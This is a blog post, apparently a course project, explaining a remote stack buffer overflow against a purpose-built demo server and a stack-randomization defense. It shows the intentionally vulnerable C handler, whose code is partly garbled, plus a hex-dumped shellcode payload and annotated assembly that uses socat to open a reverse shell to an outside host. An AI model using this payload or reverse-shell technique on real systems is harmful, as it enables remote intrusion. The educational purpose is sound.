A Remote Exploit and its Counter

The project was done on a linux system running on an x86 machine and this article assumes this henceforth.

Remote Exploit


The remote exploit demonstrated in this project is a general remote buffer overflow exploit. Simply speaking, the idea is that the server uses a buffer on its stack to store the input from the network and while doing it fails to check bounds on the buffer. This allows a malicious attacker to send a payload to the server which overflows the buffer on the server corrupting the server’s stack.

However, corrupting the server’s execution stack arbitrarily causes the server to crash. This is not our primary motive. We would like to corrupt the stack in such a way that we are able to execute arbitrary code on the server machine. Hence a specially fabricated payload is sent to the server which includes code and some trickery causing the server to corrupt its stack and execute the code sent.

At a high level, a remote exploit works in the following manner. The execution stack of a process contains activation records of the functions which the process visits. At any point in time, the stack contains the activation records of all the functions which the process into which the process has entered and not yet exited. When a function calls another function, a return address (inside the callee’s code) is saved on the stack which enables the process to resume the callee once the called function is done. It is this return address which is clobbered by the malicious payload. Hence the buffer is overflowed till the point it hits the return address. The attacker attempts to clobber the return address on the stack with an address which points to its own code it sent in the payload. If things go fine (usually after some trial and error on the part of the attacker) then instead of returning back to the callee, the code in the payload is executed giving the attacker a way to execute arbitrary code on the system.


A custom server has been written to demonstrate the remote exploit. This server expects a string (say the name of a person) and returns a new string which includes the name and a message with it. The code which processes the request is shown below.

void handle_request(int client_fd)
        char name[BUF_SIZE];
        int r, t=0;
        int rand;
        fprintf(stderr,"address of name is %xn", name);
        //This section of code is the buffer overflow vulnerability. It writes to name[] till EOF and not till name[] is full.
                r=read(client_fd, (char*)(name+t), BLK_SIZE);
        //Null terminate the data we got so that we can print it.
        *((char*)(name+t)) = '';

//Process the request.
        fd_send(client_fd, name, strlen(name));
        //Get a random string based on time.
        rand = (int)(time(NULL) % MAX_MSGS);
        fd_send(client_fd, msg[rand], strlen(msg[rand]));

Note that the buffer for the name is kept as a local variable (and hence allocated on the stack) and though its size is fixed, in the loop following it, the buffer is written to without any checks on its bounds. This represents a very typical buffer overflow vulnerability. We also print the address of the start of this buffer in the function for our convenience so that we know where is our payload going to be situated in memory.
Recalling that the stack grows downwards (high memory to low memory) on x86 systems we understand that overflowing the buffer name[] eventually hits the word on the stack which stores the return address to the callee of the function handle_request. We now construct a malicious payload (there is an implementation of a program which does that) such that it is padded with a “guessed” return address towards the end. The malicious payload looks something like this:

000000  90 90 eb 32 5e 89 76 30  8d 46 0f 89 46 34 8d 46  |...2^.v0.F..F4.F|
000010  23 89 46 38 c7 46 3c 00  00 00 00 b8 0b 00 00 00  |#.F8.F<.........|
000020  8d 4e 30 89 f3 8d 56 3c  cd 80 bb 00 00 00 00 b8  |.N0...V<........|
000030  01 00 00 00 cd 80 e8 c9  ff ff ff 2f 75 73 72 2f  |.........../usr/|
000040  62 69 6e 2f 73 6f 63 61  74 00 54 43 50 3a 72 69  |bin/socat.TCP:ri|
000050  74 65 73 68 31 2d 63 73  3a 39 39 39 39 00 45 58  |tesh1-cs:9999.EX|
000060  45 43 3a 2f 62 69 6e 2f  73 68 00 00 00 00 00 00  |EC:/bin/sh......|
000070  00 00 00 00 00 00 00 00  c0 f2 ff bf c0 f2 ff bf  |................|

Our guessed stack address is 0xbffff2c0 which we can see appearing twice at the end of the payload. The little endianness of the x86 architecture accounts for the bytes seen in reverse order. The rest of the bytes is the machine code representation of the following assembly program:

.globl _start
        .type   _start, @function
# We directly start with a _start label and don't bother about going through a C startup code. Similarly we won't be linking to glibc for calling system calls. */
        jmp     L1              # 2 bytes (jump to the call instruction)
        popl    %esi            # 1 byte (the address of /bin/socat is now in %esi, this is because of the call instruction just before "/bin/socat and the call being made to this instr.)
        movl    %esi, 48(%esi)  # 3 bytes (prepare the address of the address of "/bin/socat")
        leal    15(%esi), %eax  # 3 bytes (prepare the address of the address of "TCP4...")
        movl    %eax, 52(%esi)  # 3 bytes
        leal    35(%esi), %eax  # 3 bytes (prepare the address of the address of "EXEC...")
        movl    %eax, 56(%esi)  # 3 bytes
        movl    $0, 60(%esi)    # 7 bytes (prepare the null address right after the address of address of "EXEC...")
        movl    $0xb, %eax      # 5 bytes (0xb is the execve sys_call)
        leal    48(%esi), %ecx  # 3 bytes (prepare sys call params)
        movl    %esi, %ebx      # 2 bytes (prepare sys call params)
        leal    60(%esi), %edx  # 3 bytes (prepare sys call params)
        int     $0x80           # 2 bytes

# exit code
        movl    $0, %ebx        # 5 bytes
        movl    $1, %eax        # 5 bytes (0x1 is the exit sys_call)
        int     $0x80           # 2 bytes
        call    L2              # 5 bytes
        .string "/usr/bin/socat"        # 15 bytes with the null terminator
        .string "TCP:ritesh1-cs:9999"   # 20 bytes with null terminator
        .string "EXEC:/bin/sh"  # 13 bytes with null terminator
#       The address to the "/bin/socat" is kept here.
#       The address to the "TCP4..." string is kept here.
#       The address to the "EXEC..." string is kept here.
#       A zero is kept here to supply to the execve syscall

If we assume that the control somehow reaches the start of this code (which is why we pad the payload with the return address at the end), then we see that first using a jmp and a call, the program tricks the machine into putting the address of the strings at the end on the stack. It then pops it out and calls on execve with the string as the program to execute. This program (/usr/bin/socat with its options) is able make a connection to a specific machine (ritesh1-cs.cs.unc.edu in our case here) and fetches commands to execute in a shell. Thus, if this code is executed, ritesh1-cs will see a connection request; when accepted, it gives us access to a shell (/bin/sh) running on the remote system.
The only task which remains is to guess the address of the buffer where the payload will be situated, so that we can construct a payload with the same address padded towards its end. The attacker can only guess that address; however, in our implementation we print the address of the buffer for our convenience and construct the payload using that.
Note that the size of our code in the payload may not be an integral number of words. In such a case we pad it with nops in the front to make it so. Padding with nops also helps in reducing some guess work from the return address, as now in a trial and error session, one can skip nop bytes for the next address to try.

The Counter


The basic idea of the counter comes from the fact that the attacker has to be good at guessing the address of the buffer where the payload will be loaded. In general, standard systems with default configurations have little variation in the placement of activation records on the stack from system to system. Thus, having known the address of a buffer in one system, an attacker can easily guess (with few trials) the address of the buffer on another system. However, if on every trial from the attacker, the activation record of the vulnerable function is placed at a different random location in the stack, then the attacker will not be able to guess it over many trials. We will henceforth call this technique Stack Randomization and will see a way to easily implement this.
Note that this technique has a few limitations. First, it is not possible to stop the attacker to guess the randomized address of the buffer once the server has already been started. Thus, if the server say is a forking server, the address of the buffer is not different in the various forks of the same process. The attacker could potentially use this to guess the address after a number of tries. However, if the server crashes and respawns while being attacked, (which might happen if the attacker is trying different kinds of payload on it), then the stack address will be randomized once again.


Please read the accompanied document for the rest of the content. Source Code is present here.

This entry was posted in Computing. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s